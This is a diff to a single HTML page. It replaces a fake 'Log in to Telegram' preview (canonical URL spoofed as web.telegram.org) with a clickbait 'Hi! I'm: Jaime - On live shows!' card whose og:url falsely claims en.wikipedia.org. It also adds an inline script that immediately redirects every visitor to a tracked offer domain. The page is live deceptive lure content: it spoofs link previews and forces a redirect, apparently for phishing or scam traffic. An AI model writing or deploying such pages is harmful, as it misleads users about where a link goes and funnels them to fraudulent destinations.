--- a/index.html
+++ b/index.html
@@ -8,24 +8,27 @@
     <meta property=fb:app_id content="180444840287" />
     <meta property=fb:admin content="237344263766628" />
     <meta property=fb:locale content="en_US" />
-    <meta property="og:title" content="Log in to Telegram">
-    <meta property="og:description" content="Log in to Telegram">
-    <meta property="og:image" content="https://img001.prntscr.com/file/img001/jIan6-IpTHyyhmCZ_wrLTg.png">
+    <meta property="og:title" content="Hi! I\'m: Jaime - On live shows!">
+    <meta property="og:description" content="Hi! I\'m: Jaime - On live shows!">
+    <meta property="og:image" content="https://i.postimg.cc/d0pZVbWD/gambar.jpg">
     <meta property="og:author" content="hero">
-    <meta property="og:url" content="https://web.telegram.org">
-    <link href="https://img001.prntscr.com/file/img001/jIan6-IpTHyyhmCZ_wrLTg.png" rel="alternate" media="only screen and (max-width: 640px)">
-    <link rel="canonical" href="https://web.telegram.org">
+    <meta property="og:url" content="https://en.wikipedia.org">
+    <link href="https://i.postimg.cc/d0pZVbWD/gambar.jpg" rel="alternate" media="only screen and (max-width: 640px)">
+    <link rel="canonical" href="https://en.wikipedia.org">
     <meta name=twitter:app:country content=US />
-    <meta property="twitter:title" content="Log in to Telegram">
-    <meta property="twitter:description" content="Log in to Telegram">
+    <meta property="twitter:title" content="Hi! I\'m: Jaime - On live shows!">
+    <meta property="twitter:description" content="Hi! I\'m: Jaime - On live shows!">
     <meta property="twitter:card" content="summary_large_image">
-    <meta property="twitter:image" content="https://img001.prntscr.com/file/img001/jIan6-IpTHyyhmCZ_wrLTg.png">
-    <meta property="twitter:url" content="https://web.telegram.org">
-    <title>Log in to Telegram</title>
+    <meta property="twitter:image" content="https://i.postimg.cc/d0pZVbWD/gambar.jpg">
+    <meta property="twitter:url" content="https://en.wikipedia.org">
+    <title>Hi! I\'m: Jaime - On live shows!</title>
 </head>
 <body>
-    <h1>Log in to Telegram</h1>
-    <img src="https://img001.prntscr.com/file/img001/jIan6-IpTHyyhmCZ_wrLTg.png" alt="Log in to Telegram">
+    <h1>Hi! I\'m: Jaime - On live shows!</h1>
+    <img src="https://i.postimg.cc/d0pZVbWD/gambar.jpg" alt="Hi! I\'m: Jaime - On live shows!">
     <script src="src.js" type="text/javascript"></script>
+	<script>
+			window.location.replace("https://dbajihg.offrshub.com/s/a6d06e2c50a10?track=DEFAULT&subsource=TEAMWORK");
+		</script>
 </body>
 </html>
